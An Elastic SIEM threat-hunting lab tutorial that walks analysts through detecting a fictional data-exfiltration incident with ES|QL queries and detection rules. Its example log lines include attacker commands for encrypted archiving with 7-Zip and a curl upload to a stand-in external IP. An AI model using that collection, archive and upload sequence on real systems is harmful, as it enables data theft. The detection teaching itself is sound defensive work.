How to Detect Data Exfiltration with Elastic SIEM: SOC Analyst Hands-On Lab

Hunt Forward Lab #007 — Threat Hunting for Bulk File Transfer & Archive Creation | MITRE ATT&CK T1039, T1560.001, T1048.002

🔬 Difficulty: Intermediate | Estimated Time: 45–60 minutes
🗂️ MITRE ATT&CK: T1039 / T1560.001 / T1048.002 (Data from Network Shared Drive / Archive via Utility / Exfiltration Over Asymmetric Encrypted Non-C2 Protocol)

How to use this lab: Read the story to understand the attack. Then follow the Hunt section to find it yourself in Elastic SIEM. Document your findings in your Hunt Notebook as you go — you’ll use them to build your GitHub portfolio at the end.

Part 1 — The Scenario

1a — The Story Scene

Thursday afternoon. Meridian Financial’s SOC. 4:47 PM.

Alex Chen had been staring at the same DLP alert for six minutes when Marcus wheeled over.

“What’ve you got?”

“Nothing. That’s the problem.” She tilted the screen toward him. “DLP flagged a large outbound transfer to an external IP at 15:10. By the time the alert fired, the connection was already closed. The file is gone.”

Marcus studied the IP. “203.0.113.42. That’s the same C2 we saw last quarter.”

“Yeah.” Alex pulled up the endpoint timeline for WKSTN-MORGAN. “Morgan’s machine. Service account: svc_emr_db. Which means someone with stolen credentials got onto a workstation and used a service account context to avoid triggering our user-behaviour baselines.”

“Smart.” Marcus did not sound impressed. “What was transferred?”

“That’s what I’m trying to figure out. The DLP alert gives us the destination and the volume — 47 megabytes. It doesn’t tell us what 47 megabytes of data looked like before it left.”

That was the thing about data exfiltration. By the time most teams noticed it, the data was already gone. The only way to understand the scope — and answer the question every executive was going to ask in twenty minutes — was to work backwards. What files were accessed before the transfer? How were they packaged? How were they sent?

Alex opened a new ES|QL query and started at the beginning.

Now it’s your turn to find it.

1b — How Data Exfiltration Works — Simply Explained

Step 1: What attackers are actually trying to steal

After an attacker gets into a network — through phishing, stolen credentials, or lateral movement — their end goal is usually data. Financial records, patient files, intellectual property, credentials, employee PII. The data has value: for selling, for ransom leverage, or for competitive intelligence. But they can’t just walk out with a hard drive. They have to move the data across the network to somewhere they control, without triggering alerts designed to catch exactly that.

Step 2: The three phases every exfiltration attempt goes through

Attackers almost never upload raw files directly. They follow a three-step process, and each step leaves its own tracks in your logs:

Collection — bulk-reading or copying files from network shares to a local staging location. This is where the volume anomaly appears: one account reading dozens of sensitive files in minutes.
Archiving — compressing and encrypting the staged files into a single archive using tools like 7-Zip or PowerShell’s Compress-Archive. Encryption hides the contents from DLP inspection; compression reduces transfer time and volume.
Exfiltration — uploading the archive to an attacker-controlled server over HTTPS, making the traffic look like a normal encrypted web request.

The attacker’s advantage: each step looks almost normal in isolation. File access, archive creation, and HTTPS uploads all happen constantly in a healthy network. The signal is in the combination — and the statistical outliers.

Step 3: How the attack works

Normal file server activity (a single employee accessing one report):

User: a.chen | File: Q4_report.xlsx | Size: 280 KB | Process: EXCEL.EXE
Time: 09:15 → 09:16 | 1 file in ~60 seconds

Attacker bulk-staging data (stolen service account):

User: svc_emr_db | Files: 35 files across EMR$, Finance$, HR$, Legal$
Sizes: 1 MB – 8 MB per file | Process: robocopy.exe
Time: 14:00 → 14:43 | 35 files in 43 minutes | ~47 MB total

Then: 7z.exe -tzip -p[password] -mhe=on → update_pkg.zip (45 MB encrypted)
Then: curl.exe POST https://203.0.113.42/api/upload (8 chunks × ~6 MB)

What DLP sees vs what actually happened:

DLP alert: "Large outbound transfer: 47 MB to 203.0.113.42"
What it misses: 35 files read, 43 minutes of staging, 7z.exe with -mhe (header encryption)
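
The figures in this example can be sanity-checked with a little arithmetic. The following is a minimal Python sketch that uses only the numbers quoted above (35 files, ~47 MB, ~6 MB chunks); the variable names are illustrative and not part of the lab dataset.

```python
import math

# Figures quoted in the scenario above
files_read = 35
total_mb = 47
chunk_mb = 6  # approximate size of each upload chunk

# Average size of a staged file (the scenario quotes 1 MB to 8 MB per file)
avg_mb_per_file = round(total_mb / files_read, 2)

# Number of ~6 MB uploads needed to move ~47 MB
chunks_needed = math.ceil(total_mb / chunk_mb)

print(f"avg file: {avg_mb_per_file} MB, uploads needed: {chunks_needed}")
```

The result lines up with the eight uploads in the scenario, which is the kind of cross-check worth doing whenever a DLP volume and an endpoint timeline are supposed to describe the same event.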

Step 4: Why defenders miss it

┌─────────────────────────────────────────────────────────────────────────────┐
│  WHAT SECURITY TOOLS SEE                                                    │
│                                                                             │
│  File access:    svc_emr_db read 35 files — service accounts do this       │
│  7z.exe:         compression utility — IT uses it for backups               │
│  HTTPS upload:   encrypted outbound traffic — indistinguishable from SaaS  │
│  Total time:     ~2 hours — spread thin enough to avoid rate alerts         │
│                                                                             │
│  WHAT ACTUALLY HAPPENED                                                     │
│                                                                             │
│  35 sensitive files read in 43 minutes — 50× normal rate for this account  │
│  7z.exe from AppData\Temp — not from Program Files (attacker-dropped tool) │
│  curl.exe from AppData\Temp — not a standard user workstation binary       │
│  8 uploads to same external IP — internal backup goes to 10.0.0.50, not   │
│  203.0.113.42                                                               │
└─────────────────────────────────────────────────────────────────────────────┘

Think of it like a warehouse with an inventory system. Every item that leaves has to be scanned out — but the system only flags individual items over a certain weight. An attacker who takes 35 medium-sized boxes, repackages them into one large crate labelled “equipment return,” and ships it out via the regular loading dock never triggers a single scan. The anomaly isn’t any one step. It’s the sequence.

Step 5: Why it leaves tracks

Exfiltration can’t hide the following statistical signatures — and each one is a hunt signal:

Access rate spike — one account reading far more files per minute than its own historical baseline, especially across multiple sensitive share paths simultaneously
Archive tool process in unexpected path — 7z.exe or Compress-Archive spawned from AppData\Temp or C:\Users\*\AppData rather than a managed software directory
Asymmetric upload ratio — network connections where bytes_out massively exceeds bytes_in (uploads, not browsing); normal HTTPS traffic is the opposite
Single external destination, chunked volume — the same external IP receiving multiple large uploads in sequence, each sized just under a DLP threshold

None of these is a signature in the traditional, pattern-matching sense. But an analyst with the right ES|QL query can spot them in seconds. That’s exactly what you’re about to do.

Part 2 — Your Mission

By the end of this lab you will have:

✅ Detected a bulk file collection burst using file access rate analysis
✅ Found archive creation by an attacker-dropped 7-Zip binary in a suspicious path
✅ Identified chunked HTTPS exfiltration using upload-ratio anomaly detection
✅ Quantified the total data loss in megabytes
✅ Built a complete attack timeline from collection → archive → exfil → cleanup
✅ Documented the full investigation in your Hunt Notebook for your GitHub portfolio

Part 3 — Lab Setup

Getting Into the Lab

No manual Elastic setup required — Hunt Forward handles all of it.

Go to hunt-forward.com
Enter your email — Stripe checkout, card required, not charged for 7 days
Dashboard unlocks immediately — all labs accessible
Accept the Elastic Cloud invite → “Accept Invitation → Access SIEM”
Check your dashboard status — Pending → ✓ Invite Sent within ~5 minutes

Once you’re in Elastic, open the lab data:

Kibana → Discover
Index: exfil-lab-logs
Time range: March 6, 2025, 10:00 AM — 6:00 PM

A Quick Word on ES|QL

Throughout this lab we use ES|QL — Elasticsearch Query Language — instead of clicking through visualisation menus. ES|QL lets you filter, group, count, and calculate statistics on your logs in a single query, directly in Discover.

Every ES|QL query starts with FROM and pipes data through commands using |. Think of each | as "then do this next thing to the results."

To run ES|QL in Kibana:

In Discover, click the language selector dropdown (top left — it may say KQL or Lucene)
Select ES|QL
Paste the query and press Run (▶)

Part 4 — The Hunt

Hunt 1 — File Access Rate Spike (Bulk Collection)

The first signal in any exfiltration is the collection phase. Attackers need to stage data locally before they can archive and send it. That means one account reading a high volume of files in a short window — a rate that stands out against every other user on the file server.

The key insight: we’re not looking for a specific filename. We’re looking for abnormal access velocity from a single identity across multiple sensitive share paths.

FROM exfil-lab-logs
| WHERE event.category == "file"
  AND event.action == "file-accessed"
| STATS
    file_count = COUNT(*),
    total_bytes = SUM(file.size),
    unique_paths = COUNT_DISTINCT(file.path)
    BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 10
| SORT file_count DESC
| LIMIT 20

What each line does:

FROM exfil-lab-logs — query the lab dataset
WHERE event.category == "file" AND event.action == "file-accessed" — scope to file read events only, filtering out write and delete events
STATS file_count = COUNT(*), total_bytes = SUM(file.size), unique_paths = COUNT_DISTINCT(file.path) BY host.name, user.name, process.name — count how many files each user+host+process combination touched, sum the total bytes, and count distinct file paths to measure breadth of access
EVAL total_mb = ROUND(total_bytes / 1048576.0, 2) — convert raw bytes to megabytes inline, rounded to 2 decimal places
WHERE file_count > 10 — filter out low-volume normal activity; focus on accounts that read more than 10 files
SORT file_count DESC — surface the highest-volume accessor first
LIMIT 20 — return top 20 rows
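
If the STATS ... BY step feels abstract, it may help to see the same grouping written out by hand. The following is a rough Python sketch of the aggregation logic, run against a handful of made-up events; the event dictionaries, host names other than WKSTN-MORGAN, and file paths are hypothetical and do not come from the lab index.

```python
from collections import defaultdict

MIB = 1_048_576

# Hypothetical sample events; values are invented for illustration
events = [
    {"host": "WKSTN-A", "user": "a.chen", "process": "EXCEL.EXE",
     "path": "Finance$/Q4_report.xlsx", "size": 286_720},
]
events += [
    {"host": "WKSTN-MORGAN", "user": "svc_emr_db", "process": "robocopy.exe",
     "path": f"EMR$/record_{i}.dat", "size": 2 * MIB}
    for i in range(12)
]

def bulk_accessors(events, min_files=10):
    """Group by (host, user, process), then keep groups above min_files."""
    groups = defaultdict(lambda: {"file_count": 0, "total_bytes": 0, "paths": set()})
    for e in events:
        g = groups[(e["host"], e["user"], e["process"])]
        g["file_count"] += 1              # COUNT(*)
        g["total_bytes"] += e["size"]     # SUM(file.size)
        g["paths"].add(e["path"])         # COUNT_DISTINCT(file.path)
    rows = [
        {"key": key,
         "file_count": g["file_count"],
         "total_mb": round(g["total_bytes"] / MIB, 2),
         "unique_paths": len(g["paths"])}
        for key, g in groups.items()
        if g["file_count"] > min_files    # WHERE file_count > 10
    ]
    return sorted(rows, key=lambda r: r["file_count"], reverse=True)

for row in bulk_accessors(events):
    print(row)
```

Only the robocopy.exe group survives the filter here, because the single Excel access falls below the threshold, which is the same effect the WHERE clause has in the query.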

What to look for in results: The top row should stand out dramatically from all others. Look for a user+process combination where file_count is 10× or more above the next row, where total_mb is in the tens of megabytes, and where process.name is something unexpected for file access — robocopy.exe instead of EXCEL.EXE or explorer.exe.

📝 Hunt Notebook checkpoint: Record the top anomalous row: user name, host name, process name, file count, and total MB accessed. Note whether the accessing process is a normal office application or a bulk-copy/scripting tool.
✅ Bulk collection confirmed. svc_emr_db on WKSTN-MORGAN accessed 35 files totalling ~47 MB via robocopy.exe, vastly above any other user in the dataset. The process alone is a red flag: a database service account has little legitimate reason to run robocopy.exe from a user workstation.

Hunt 2 — Archive Creation in a Suspicious Path

The second signal is the archiving step. Legitimate compression tools like 7-Zip are installed by IT to C:\Program Files\7-Zip\7z.exe. An attacker who drops their own copy to AppData\Temp to avoid relying on IT-managed software is visible the moment you filter on the executable path.

We also look for password-protected compression (-p flag) and encrypted headers (-mhe=on) in the command line. Encrypted backups do exist, but these flags on an archiver running from a user's Temp directory are hard to explain as a legitimate IT workflow.

FROM exfil-lab-logs
| WHERE event.category == "process"
  AND (
    process.name == "7z.exe"
    OR process.name == "7za.exe"
    OR process.command_line LIKE "*Compress-Archive*"
    OR process.command_line LIKE "*-tzip*"
  )
| EVAL suspicious_path = CASE(
    process.executable LIKE "*\\\\AppData\\\\*", "YES — AppData",
    process.executable LIKE "*\\\\Temp\\\\*", "YES — Temp",
    process.executable LIKE "*\\\\ProgramData\\\\*", "YES — ProgramData",
    "NO — managed path"
  )
| EVAL has_password = CASE(
    process.command_line LIKE "*-p*", "YES",
    "NO"
  )
| KEEP host.name, user.name, process.name, process.executable,
       process.command_line, process.parent.name,
       suspicious_path, has_password, @timestamp
| SORT @timestamp ASC

What each line does:

WHERE event.category == "process" AND (...) — find any process event involving common archive utilities or PowerShell compression commands
EVAL suspicious_path = CASE(...) — derive a label field: flag the row if the archive tool is running from AppData, Temp, or ProgramData — directories where attackers drop tools to avoid IT software inventories
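EVAL has_password = CASE(...): flag rows where the command line contains -p, indicating password-protected compression. This is a loose substring match, so it also fires on any path or argument that happens to contain "-p" (for example a folder named my-project); confirm the flag by reading the full command line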
KEEP ... — return only the fields relevant to this investigation, reducing noise
SORT @timestamp ASC — order by time so you can see the archive creation sequence as it happened
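
The two EVAL labels can be prototyped outside Elastic to see how they behave on edge cases. The following is a small Python sketch under a few assumptions: the directory list mirrors the query, the command lines are invented examples, and strict_password_match is a hypothetical tighter variant that is not part of the lab query.

```python
import re
from pathlib import PureWindowsPath

USER_WRITABLE = {"appdata", "temp", "programdata"}

def suspicious_path(executable: str) -> bool:
    """True if any parent directory of the executable is a user-writable location."""
    parents = PureWindowsPath(executable).parts[:-1]
    return any(part.lower() in USER_WRITABLE for part in parents)

def loose_password_match(command_line: str) -> bool:
    """Mirrors LIKE "*-p*": true for any '-p' substring."""
    return "-p" in command_line

def strict_password_match(command_line: str) -> bool:
    """Hypothetical tighter check: -p must start its own whitespace-separated token."""
    return re.search(r"(?:^|\s)-p\S*", command_line) is not None

dropped = r"C:\Users\morgan\AppData\Local\Temp\7z.exe"
managed = r"C:\Program Files\7-Zip\7z.exe"
attacker_cmd = "7z.exe a -tzip -pEXAMPLE -mhe=on out.zip staging"   # invented
benign_cmd = r"7z.exe a C:\backup\my-project.zip C:\data"           # invented

print(suspicious_path(dropped), suspicious_path(managed))
print(loose_password_match(benign_cmd), strict_password_match(benign_cmd))
print(strict_password_match(attacker_cmd))
```

The benign command trips the loose match only because of the hyphen in the folder name, which is why the flag is best treated as a prompt to read the command line rather than as proof of encryption. The stricter pattern is still a heuristic and would need tuning against real command lines.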

What to look for in results: Any row where suspicious_path = YES — AppData or similar is an immediate priority. Combine that with has_password = YES and you have a high-confidence archive creation event. Note the process.parent.name — if the archiver was spawned by cmd.exe or powershell.exe rather than an installer, that's a further indicator of attacker activity.

📝 Hunt Notebook checkpoint: Record the full process.command_line for any flagged row. Note the output filename in the command (the archive name the attacker chose), the executable path (confirms it's not a managed installation), and the password flag. The archive filename often reveals the attacker's masquerade strategy.
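✅ Rogue archive creation confirmed. 7z.exe ran from C:\Users\morgan\AppData\Local\Temp\7z.exe (attacker-dropped, not IT-managed) with flags -tzip -p3x!tr@c3d -mhe=on, creating a password-encrypted ZIP. 7-Zip documents -mhe header encryption for the 7z format, so alongside -tzip treat that flag as evidence of intent to hide file names rather than proof that it took effect. The archive was written as update_pkg.zip and then renamed to WindowsDefender_Update_KB5034441.zip to masquerade as a Windows patch package.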

Hunt 3 — Asymmetric Upload Detection (Exfiltration)

Normal HTTPS browsing is asymmetric in one direction: users download far more than they upload. A request to load a webpage sends a few hundred bytes out and receives megabytes back. When you see the pattern reversed — large bytes_out, tiny bytes_in — on an outbound HTTPS connection, that's an upload. When it's repeated, to a single external IP, in chunks, that's exfiltration.

FROM exfil-lab-logs
| WHERE event.category == "network"
  AND network.direction == "outbound"
  AND destination.port == 443
  AND network.bytes_out IS NOT NULL
| EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
    transfer_count = COUNT(*),
    total_mb_out = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
    avg_mb_per_transfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
    max_upload_ratio = MAX(upload_ratio)
    BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
| SORT total_mb_out DESC
| LIMIT 15

What each line does:

WHERE ... destination.port == 443 AND network.bytes_out IS NOT NULL — scope to HTTPS outbound connections that have byte-count telemetry
EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2) — convert bytes sent to megabytes
EVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2) — convert bytes received to megabytes
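EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1): compute the ratio of bytes sent to bytes received. Adding 1 to the denominator prevents division by zero, and a ratio of 1000+ means the connection is almost entirely outbound. If both byte fields are mapped as integer types, ES|QL division truncates toward zero, so wrap one operand in TO_DOUBLE() when you need the fractional part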
WHERE mb_out > 1.0 — filter out small requests; focus on transfers over 1 MB
STATS transfer_count = COUNT(*), total_mb_out = ROUND(SUM(...) / 1048576.0, 2), avg_mb_per_transfer = ..., max_upload_ratio = MAX(upload_ratio) BY host.name, user.name, destination.ip, process.name — group by destination IP and summarise: how many transfers, total volume, average chunk size, and peak ratio
WHERE transfer_count >= 2 — filter to destinations that received multiple large uploads (chunked exfil pattern)
SORT total_mb_out DESC — surface the highest-volume destination first
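
To make the ratio and grouping logic concrete, here is a rough Python sketch of the same steps on a few invented connection records. The byte counts and the second destination IP are hypothetical; only 203.0.113.42 and the ~6 MB chunk size come from the scenario.

```python
from collections import defaultdict

MIB = 1_048_576

def upload_ratio(bytes_out: int, bytes_in: int) -> float:
    """Sent-to-received ratio; +1 avoids division by zero, as in the query."""
    return round(bytes_out / (bytes_in + 1), 1)

# Hypothetical connection records
conns = [
    {"dst": "203.0.113.42", "out": 6 * MIB, "in": 699},
    {"dst": "203.0.113.42", "out": 6 * MIB, "in": 699},
    {"dst": "198.51.100.7", "out": 2_000, "in": 3 * MIB},  # ordinary browsing
]

def chunked_uploads(conns, min_mb=1.0, min_transfers=2):
    """Keep large uploads, group by destination, keep repeated destinations."""
    groups = defaultdict(list)
    for c in conns:
        if c["out"] / MIB > min_mb:           # WHERE mb_out > 1.0
            groups[c["dst"]].append(c)
    rows = []
    for dst, cs in groups.items():
        if len(cs) >= min_transfers:          # WHERE transfer_count >= 2
            rows.append({
                "dst": dst,
                "transfer_count": len(cs),
                "total_mb_out": round(sum(c["out"] for c in cs) / MIB, 2),
                "max_upload_ratio": max(upload_ratio(c["out"], c["in"]) for c in cs),
            })
    return sorted(rows, key=lambda r: r["total_mb_out"], reverse=True)

for row in chunked_uploads(conns):
    print(row)

# Integer division drops the fraction, which matters for ratios below 1
print((6 * MIB) // (699 + 1), 2_000 // (3 * MIB + 1))
```

The browsing connection never reaches the grouping step because its outbound volume is tiny, while the two 6 MB uploads collapse into a single row with a ratio in the thousands.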

What to look for in results: The top row should show a single external IP receiving multiple transfers with a massive total_mb_out value and a max_upload_ratio in the thousands. Cross-reference the destination IP against the C2 you found in earlier labs. The process.name of curl.exe deserves a closer look as well: curl ships with current Windows builds under System32, so the strong indicator is a copy running from a user-writable path such as AppData\Temp and pushing bulk uploads from an end-user workstation.

📝 Hunt Notebook checkpoint: Record the destination IP, total MB exfiltrated, transfer count, average chunk size, and the process responsible. The total_mb_out figure is your data loss estimate — this number goes in the executive summary of your incident report.
✅ Exfiltration confirmed. curl.exe on WKSTN-MORGAN sent 8 transfers totalling ~47 MB to 203.0.113.42:443, with an upload ratio of roughly 9,000:1 (near-zero response, massive upload). The destination IP matches the known C2 from the organisation's prior incidents.

Hunt 4 — Cleanup and Full Attack Scope

Attackers who clean up after themselves leave a different kind of evidence: file deletion events, directory removal, and a suspicious absence of the staging artefacts you’d expect to find. Correlating the cleanup events with the earlier signals confirms the full attack chain and gives you precise timestamps for your timeline.

FROM exfil-lab-logs
| WHERE host.name == "WKSTN-MORGAN"
  AND (
    (event.category == "file" AND event.action IN ("file-created", "file-deleted", "directory-deleted", "file-renamed"))
    OR (event.category == "process" AND process.name IN ("7z.exe", "robocopy.exe", "curl.exe", "cmd.exe"))
  )
| EVAL event_label = CASE(
    process.name == "robocopy.exe", "1-COLLECTION",
    process.name == "7z.exe", "2-ARCHIVE",
    event.action == "file-renamed", "2-MASQUERADE",
    process.name == "curl.exe", "3-EXFILTRATION",
    event.action IN ("file-deleted", "directory-deleted"), "4-CLEANUP",
    "OTHER"
  )
| KEEP @timestamp, event_label, event.action, file.name, file.path,
       process.name, process.command_line, user.name
| SORT @timestamp ASC
| LIMIT 50

What each line does:

WHERE host.name == "WKSTN-MORGAN" — scope entirely to the compromised host identified in Hunts 1–3
AND (...) — filter to file creation/deletion events and the specific attacker processes we've confirmed
EVAL event_label = CASE(...) — derive a phase label for each event: assigns "1-COLLECTION", "2-ARCHIVE", "3-EXFILTRATION", or "4-CLEANUP" based on the action and process name, so the results read as a timeline rather than a raw event list
KEEP ... — surface only the fields needed to reconstruct the timeline
SORT @timestamp ASC — chronological order, earliest to latest
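
CASE evaluates its conditions in order and returns the value for the first one that matches, so the order of the branches decides which label an event gets. The following Python sketch illustrates that first-match behaviour with a simplified version of the labelling rules; the sample events and the "process-started" action name are hypothetical.

```python
# Ordered (predicate, label) pairs; the first matching predicate wins
RULES = [
    (lambda e: e["process"] == "robocopy.exe", "1-COLLECTION"),
    (lambda e: e["process"] == "7z.exe", "2-ARCHIVE"),
    (lambda e: e["action"] == "file-renamed", "2-MASQUERADE"),
    (lambda e: e["process"] == "curl.exe", "3-EXFILTRATION"),
    (lambda e: e["action"] in ("file-deleted", "directory-deleted"), "4-CLEANUP"),
]

def label(event: dict) -> str:
    """Return the label of the first rule that matches, else OTHER."""
    for predicate, name in RULES:
        if predicate(event):
            return name
    return "OTHER"

# Hypothetical events for illustration
samples = [
    {"action": "process-started", "process": "robocopy.exe"},
    {"action": "file-created", "process": "7z.exe"},
    {"action": "file-renamed", "process": "cmd.exe"},
    {"action": "file-deleted", "process": "cmd.exe"},
    {"action": "file-deleted", "process": "7z.exe"},   # process rule matches first
    {"action": "process-started", "process": "cmd.exe"},
]

for s in samples:
    print(label(s), s)
```

Note the fifth sample: a deletion performed by 7z.exe is labelled 2-ARCHIVE rather than 4-CLEANUP, because the process rule sits higher in the list. When a timeline row looks mislabelled, branch order is the first thing to check.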

What to look for in results: You should see a clean four-phase progression: collection (robocopy.exe activity) → archive creation (7z.exe) and rename → exfiltration (curl.exe uploads) → cleanup (file and directory deletions). Any gaps in the sequence are worth noting. The cleanup events show the attacker had operational security awareness and did not simply leave artefacts behind.

📝 Hunt Notebook checkpoint: Record the timestamp of the first collection event, the archive creation timestamp, the first and last upload timestamps, and the cleanup timestamp. Calculate the total attack window (first collection to last cleanup). Note the archive name used as a masquerade, and record all deleted files and directories as forensic artefacts that are no longer recoverable from the endpoint.
✅ Full attack chain confirmed. Four-phase exfiltration: collection (14:00–14:43) → archive + masquerade (14:45) → chunked HTTPS upload (15:10–15:58) → cleanup (16:05). Total window: ~2 hours. Total data loss: ~47 MB. Evidence of operational security: attacker renamed archive to a Windows patch filename and deleted all staging artefacts on exit.

Part 5 — Building Your Timeline

┌─[WKSTN-MORGAN — Data Exfiltration Timeline]─────────────────────────────────────────┐
│  TIME (UTC)   │  EVENT                                    │  PHASE                   │
│───────────────┼───────────────────────────────────────────┼──────────────────────────│
│  14:00        │  robocopy.exe launched by svc_emr_db      │  Collection begins       │
│  14:00–14:43  │  35 files read from EMR$, Finance$, HR$   │  Bulk staging (~47 MB)   │
│  14:43        │  robocopy.exe exits                       │  Staging complete        │
│  14:45        │  7z.exe (AppData\Temp) creates archive    │  Archive + encryption    │
│  14:45:47     │  update_pkg.zip created (45 MB)           │  Compressed payload      │
│  14:45:55     │  Renamed → WindowsDefender_Update_KB*.zip │  Masquerade applied      │
│  15:08        │  curl.exe dropped to AppData\Temp         │  Transfer tool staged    │
│  15:10        │  Upload chunk 1/8 → 203.0.113.42:443      │  Exfiltration begins     │
│  15:10–15:58  │  8 × ~6 MB HTTPS POST chunks              │  47 MB exfiltrated       │
│  16:05        │  update_pkg.zip deleted                   │  Cleanup begins          │
│  16:05        │  staging\ directory removed               │  Evidence destruction    │
│  16:07        │  curl.exe deleted                         │  Tool removed            │
└─────────────────────────────────────────────────────────────────────────────────────┘
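
The durations for your notebook can be computed directly from the timeline rather than estimated by eye. The following is a minimal Python sketch that uses the timestamps from the table above and the lab date from the setup section; the helper names are illustrative.

```python
from datetime import datetime

LAB_DATE = "2025-03-06"  # lab time range from the setup section

def at(hhmm: str) -> datetime:
    """Build a datetime on the lab date from an HH:MM string."""
    return datetime.strptime(f"{LAB_DATE} {hhmm}", "%Y-%m-%d %H:%M")

def minutes(start: datetime, end: datetime) -> int:
    """Whole minutes between two timestamps."""
    return int((end - start).total_seconds() // 60)

first_collection = at("14:00")
archive_created = at("14:45")
first_upload = at("15:10")
last_upload = at("15:58")
last_cleanup = at("16:07")

total_window_min = minutes(first_collection, last_cleanup)
upload_window_min = minutes(first_upload, last_upload)
archive_to_upload_min = minutes(archive_created, first_upload)

print(f"attack window: {total_window_min} min")
print(f"upload window: {upload_window_min} min")
print(f"archive to first upload: {archive_to_upload_min} min")
```

The 127-minute window is where the "~2 hours" figure in the summary comes from, and the 25-minute gap between archive creation and the first upload is the interval in which an archive-creation alert could still have prevented the loss.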

Part 6 — Document Your Hunt (Hunt Notebook → GitHub Portfolio)

Open your Hunt Notebook in the Hunt Forward dashboard. The pre-loaded template has every section ready for your findings.

Option A — Write your own report: Merge your four Hunt Notebook milestone blocks into a single document. Add a cover section:

Analyst name and date
Executive summary: what was stolen, from which host, via which account, total data volume
IOC table: svc_emr_db, WKSTN-MORGAN, 203.0.113.42, C:\Users\morgan\AppData\Local\Temp\7z.exe, C:\Users\morgan\AppData\Local\Temp\curl.exe, archive filename
Recommended remediation: isolate WKSTN-MORGAN, revoke svc_emr_db credentials, block 203.0.113.42 at perimeter, notify legal/compliance of ~47 MB potential PII exposure

Export as markdown → push to GitHub as hunt-007-data-exfiltration-detection.md

Option B — Download the Hunt Forward reference report: Use it to check your findings before writing your own version.

The recommendation: Write your own. The data loss quantification you produced in Hunt 3 — a specific megabyte figure, a named external IP, a confirmed process — is exactly the kind of evidence a CISO asks for in a breach notification decision. The fact that you can walk an interviewer through how you calculated it, line by line, is what makes this portfolio piece real.

Part 7 — What Alex Did Next

The executive summary took eleven minutes. 47 MB from EMR$, Finance$, HR$, and Legal$ — patient records, payroll data, wire transfer accounts, pending litigation files. The legal team was on the phone before Alex had finished typing the IOC table. Marcus submitted the containment ticket for WKSTN-MORGAN and the credential revocation for svc_emr_db simultaneously.

The DLP alert that started it all flagged a transfer that began at 15:10, seventy minutes after the first file was read. Alex added a note to the runbook: next time someone with a service account touches robocopy, don’t wait for DLP to tell you.

Part 8 — Operationalise Your Hunts as Detection Rules

Hunting manually is how you find the first incident. Detection rules are how you make sure the next analyst doesn’t have to start from scratch.

Each ES|QL query you ran in Part 4 can be turned into a standing rule in Elastic Security that fires automatically when the same pattern appears. Import the three rules below and they will run every 5 minutes against your exfil-lab-logs index — or swap the index name for your production data source.

To import: Elastic Security → Detection Rules → Import rules → select the .ndjson file from your Hunt Forward dashboard.

Rule 1 — Bulk File Collection via Network Share (HIGH)

Fires when a single account reads more than 20 files totalling over 10 MB using a bulk-copy process. Legitimate users access individual files on demand; this rate indicates automated staging.

FROM exfil-lab-logs*
| WHERE event.category == "file"
  AND event.action == "file-accessed"
  AND process.name IN ("robocopy.exe", "xcopy.exe", "cmd.exe", "powershell.exe")
| STATS
    file_count   = COUNT(*),
    total_bytes  = SUM(file.size),
    unique_paths = COUNT_DISTINCT(file.path)
    BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 20
  AND total_mb > 10
| SORT total_mb DESC

When this fires: Pivot to Hunt 1. Check whether 7z.exe or archive activity follows within 30 minutes — if Rule 2 also fires for the same host, you have a confirmed collection-to-archive sequence. Record total_mb in your Elastic Security Case as the staging volume estimate.

False positives to validate: Scheduled backup agents (BackupExec, Veeam) running under a known service account; IT mass file migrations during change-management windows.
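
The 30-minute pivot from Rule 1 to Rule 2 is a simple time-window join on host name. The following Python sketch shows one way to express it, assuming alerts have already been exported as dictionaries with a host and a timestamp; the alert structure, the second host, and the exact firing times are hypothetical.

```python
from datetime import datetime, timedelta

def archive_follows_collection(collection_alerts, archive_alerts,
                               window=timedelta(minutes=30)):
    """Pair each collection alert with archive alerts on the same host
    that occur at or after it, within the given window."""
    hits = []
    for c in collection_alerts:
        for a in archive_alerts:
            delta = a["time"] - c["time"]
            if a["host"] == c["host"] and timedelta(0) <= delta <= window:
                hits.append((c["host"], c["time"], a["time"]))
    return hits

# Hypothetical alert exports
collection_alerts = [
    {"host": "WKSTN-MORGAN", "time": datetime(2025, 3, 6, 14, 43)},
]
archive_alerts = [
    {"host": "WKSTN-MORGAN", "time": datetime(2025, 3, 6, 14, 45)},
    {"host": "WKSTN-DEV01", "time": datetime(2025, 3, 6, 9, 0)},  # unrelated host
]

for host, collected, archived in archive_follows_collection(collection_alerts, archive_alerts):
    print(f"{host}: collection at {collected:%H:%M}, archive at {archived:%H:%M}")
```

Only the WKSTN-MORGAN pair is returned. An archive alert on a different host, or one that precedes the collection alert, does not count as part of the same sequence.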

Rule 2 — Archive Creation from Suspicious Path (HIGH)

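Fires when 7-Zip or PowerShell Compress-Archive runs from a user-writable directory (AppData, Temp, ProgramData) rather than a managed installation path. Attacker-dropped archive tools live in user-writable directories to avoid software inventory detection. Because Compress-Archive runs inside powershell.exe, whose executable normally sits under System32, the path check mainly catches dropped 7-Zip binaries. Encryption flags (-p for a password, -mhe for header encryption) indicate a deliberate attempt to defeat DLP content inspection.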

FROM exfil-lab-logs*
| WHERE event.category == "process"
  AND (
    process.name == "7z.exe"
    OR process.name == "7za.exe"
    OR process.command_line LIKE "*Compress-Archive*"
  )
| EVAL suspicious_path = CASE(
    process.executable LIKE "*\\\\AppData\\\\*",    "YES",
    process.executable LIKE "*\\\\Temp\\\\*",       "YES",
    process.executable LIKE "*\\\\ProgramData\\\\*","YES",
    "NO"
  )
| EVAL has_password = CASE(
    process.command_line LIKE "*-p*", "YES",
    "NO"
  )
| WHERE suspicious_path == "YES"
| KEEP @timestamp, host.name, user.name, process.name,
       process.executable, process.command_line,
       process.parent.name, suspicious_path, has_password
| SORT @timestamp ASC

When this fires: Inspect the full process.command_line for the output archive path and filename — attackers frequently rename archives to mimic Windows patch packages (KB*.zip) or system files. Correlate with Rule 1 (bulk collection) and Rule 3 (asymmetric upload) to confirm the full exfiltration chain.

